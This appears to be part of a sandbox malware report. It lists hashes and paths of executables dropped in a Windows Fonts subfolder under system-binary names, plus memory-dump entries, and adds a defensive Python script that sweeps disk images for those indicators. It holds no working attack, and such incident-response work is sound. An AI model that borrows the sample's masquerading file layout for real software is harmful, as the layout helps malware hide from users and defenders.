                                                                                                                                                                                                                                                      005c3d8ca2bb748cb989c43d23f15dc343c78a07

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      cdb648a2f50229bc3cece2a260bb147c138e61600b22a514fe70f4460caf6a8a

                                                                                                                                                                                                                                                      SHA512

  9a22c0a337ed7b0a234d309d61704fd373256301e8d427f60ef390c95ec8aff5d6b27003702351b0e24bca1fdbd1b9faf89a18d25ca6c26eacb8d3ed5e419351

• \Windows\Fonts\Mysql\ctfmon.exe
  Filesize  990KB
  MD5       526a0c8bb73b0d62e5409c8220a59fe1
  SHA1      da657600062345967dbdd19d94870742b8a7615d
  SHA256    4a7bb15f18daf41cacdb167056b8addc355c7c5c216a48c8108561bb911056c3
  SHA512    10c3e9ddfc2a5505f90d4a9f0e25be35fb9fe2a20dcaefd98fff3590baa2c2ceb96299f1b25031691698ae6a9fffbf098944e10a76d747ea28e68fc1d09f1e41

• \Windows\Fonts\Mysql\svchost.exe
  Filesize  153KB
  MD5       33d1519b1e46caa1586b03e038ca70ed
  SHA1      f3c888dc27a29bbf05e7ef92314665cd296acd91
  SHA256    8aa1eff9ce3a86c993837b631f2062ac02c4cb5ab0d660f6b2e3ad4fbe204f18
  SHA512    ff8c0bc40fefbd3220ffe31a1d0d1fa58c38dab4377f6c0bfe04201ab1a6c7b325c6718a1c82d56d42889023aa1d1aa72145a6119a2db958cc678933f52e5b13

• \Windows\Fonts\Mysql\svchost.exe
  Filesize  160KB
  MD5       d1eea115c405eb795aee7a295e1b0fde
  SHA1      300a8664616d2cc9739d1b6657d1fb0f0e5773e4
  SHA256    cd63d882cc1ccffb0d976041de69261796c129f560a7ddfdc905d8a0069c5dd8
  SHA512    b86a45313e935f2799cb3e822e96441ad9e0782706271683c39fd6d27268a87253f5b7aa5c6cce29fea7ca461029514331d33b04dded35c69e17b3eb92efdf1d

• \Windows\Fonts\Mysql\wget.exe
  Filesize  287KB
  MD5       623b7e15516f4896e515be2a81e26cbf
  SHA1      4b6fc7fb2f36b728c70a19a6be897b327dcc358d
  SHA256    ff9b58168b2f098119e035a6868f20d74915eb4c9fb55a3b796f6d90071d14b5
  SHA512    f2df365115eace102ff4bc07c20ebef843bad0e5fd17d543ac8ee9c2ec8f4e26ccd3c8b4dc8f050257bec8062f33b9d9ef83991de9de761bdacdda841e203df4

• memory/1380-115-0x00000000000C0000-0x00000000000CE000-memory.dmp
  Filesize  56KB

• memory/1380-117-0x00000000000C0000-0x00000000000CE000-memory.dmp
  Filesize  56KB

• memory/1380-121-0x0000000000CB0000-0x0000000000D9F000-memory.dmp
  Filesize  956KB

• memory/1380-107-0x0000000000CB0000-0x0000000000D9F000-memory.dmp
  Filesize  956KB

• memory/1808-84-0x0000000000400000-0x0000000000E2E000-memory.dmp
  Filesize  10.2MB

• memory/1808-21-0x0000000003290000-0x0000000003A39000-memory.dmp
  Filesize  7.7MB

• memory/1808-20-0x0000000003290000-0x0000000003A39000-memory.dmp
  Filesize  7.7MB

• memory/2564-85-0x0000000000400000-0x0000000000410000-memory.dmp
  Filesize  64KB

• memory/2688-23-0x0000000000400000-0x0000000000BA9000-memory.dmp
  Filesize  7.7MB

• memory/2688-75-0x0000000000400000-0x0000000000BA9000-memory.dmp
  Filesize  7.7MB

• memory/2688-22-0x0000000000400000-0x0000000000BA9000-memory.dmp
  Filesize  7.7MB

• memory/2768-110-0x0000000000400000-0x00000000004EF000-memory.dmp
  Filesize  956KB

• memory/2768-108-0x0000000000400000-0x00000000004EF000-memory.dmp
  Filesize  956KB
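The entries above are bare paths, hashes and memory-region names. The Python below is an added example, not part of the tria.ge report, that turns them into a check a responder can run against a mounted disk image: it hashes candidate files and matches them against the SHA256 values listed for the four dropped executables, flags executables that live under a Fonts directory or carry a system-binary name (svchost.exe, ctfmon.exe) outside System32/SysWOW64 (both heuristics are the editor's assumptions, not sandbox signatures), and parses the memory/<pid>-<n>-<start>-<end>-memory.dmp names to recompute the region sizes the report prints. The sample file contents in the block are constructed stubs, not the real dropped files.

```python
import hashlib
import re
from pathlib import Path, PureWindowsPath

# SHA256 of the executables this report lists as dropped under \Windows\Fonts\Mysql\
# (copied from the report; the two svchost.exe entries are distinct files).
DROPPED_SHA256 = {
    "4a7bb15f18daf41cacdb167056b8addc355c7c5c216a48c8108561bb911056c3": "ctfmon.exe (990KB)",
    "8aa1eff9ce3a86c993837b631f2062ac02c4cb5ab0d660f6b2e3ad4fbe204f18": "svchost.exe (153KB)",
    "cd63d882cc1ccffb0d976041de69261796c129f560a7ddfdc905d8a0069c5dd8": "svchost.exe (160KB)",
    "ff9b58168b2f098119e035a6868f20d74915eb4c9fb55a3b796f6d90071d14b5": "wget.exe (287KB)",
}

# Editor's heuristics (assumptions, not sandbox signatures): the system-binary names the
# sample reuses, and the only directories where those names belong on a stock install.
MASQUERADED_NAMES = {"svchost.exe", "ctfmon.exe"}
SYSTEM_DIRS = {"system32", "syswow64"}
EXE_SUFFIXES = {".exe", ".dll", ".sys"}

# tria.ge dump names encode pid, sequence number and the dumped virtual address range.
DUMP_RE = re.compile(r"memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def classify(win_path: str, data: bytes) -> list:
    """Return the reasons a (path, content) pair should be flagged; [] if none."""
    p = PureWindowsPath(win_path)
    dirs = {s.lower() for s in p.parts[:-1]}
    reasons = []
    digest = sha256_hex(data)
    if digest in DROPPED_SHA256:
        reasons.append("sha256 matches dropped file " + DROPPED_SHA256[digest])
    if p.suffix.lower() in EXE_SUFFIXES and "fonts" in dirs:
        reasons.append("executable under a Fonts directory")
    if p.name.lower() in MASQUERADED_NAMES and not (SYSTEM_DIRS & dirs):
        reasons.append("system binary name outside System32/SysWOW64")
    return reasons


def sweep(root: Path) -> list:
    """Walk a mounted image or directory; return (path, reasons) for every flagged file."""
    hits = []
    for f in root.rglob("*"):
        if f.is_file():
            reasons = classify(str(f), f.read_bytes())
            if reasons:
                hits.append((str(f), reasons))
    return hits


def format_size(n: int) -> str:
    """Mirror the report's labels: whole KB below 1 MiB, one decimal MB at or above it."""
    if n < 1024 * 1024:
        return f"{n // 1024}KB"
    return f"{n / (1024 * 1024):.1f}MB"


def parse_memory_dump(name: str) -> dict:
    """Recover pid, address range and region size from a tria.ge memory dump name."""
    m = DUMP_RE.search(name)
    if not m:
        raise ValueError("not a tria.ge memory dump name: " + name)
    pid, seq = int(m[1]), int(m[2])
    start, end = int(m[3], 16), int(m[4], 16)
    size = end - start
    return {"pid": pid, "seq": seq, "start": start, "end": end,
            "size": size, "size_label": format_size(size)}


if __name__ == "__main__":
    # Constructed sample content (an MZ header stub), not a real dropped file.
    stub = b"MZ" + b"\0" * 62
    for path in (r"C:\Windows\Fonts\Mysql\wget.exe",
                 r"C:\Windows\Fonts\Mysql\svchost.exe",
                 r"C:\Windows\System32\svchost.exe"):
        print(path, classify(path, stub))
    for n in ("memory/1380-115-0x00000000000C0000-0x00000000000CE000-memory.dmp",
              "memory/1808-84-0x0000000000400000-0x0000000000E2E000-memory.dmp"):
        d = parse_memory_dump(n)
        print(d["pid"], hex(d["start"]), hex(d["end"]), d["size_label"])
```

Point `sweep()` at the mounted volume (for example `sweep(Path("/mnt/evidence/Windows"))`) to get every file that either hashes to one of the listed drops or merely looks like one; the hash match is the strong indicator, the path heuristics exist to catch a rebuilt sample with the same layout but new hashes. The recomputed region sizes match the report's Filesize column (0xCE000 - 0xC0000 = 56KB, 0xE2E000 - 0x400000 = 10.2MB), which is a quick sanity check that a dump name was copied intact.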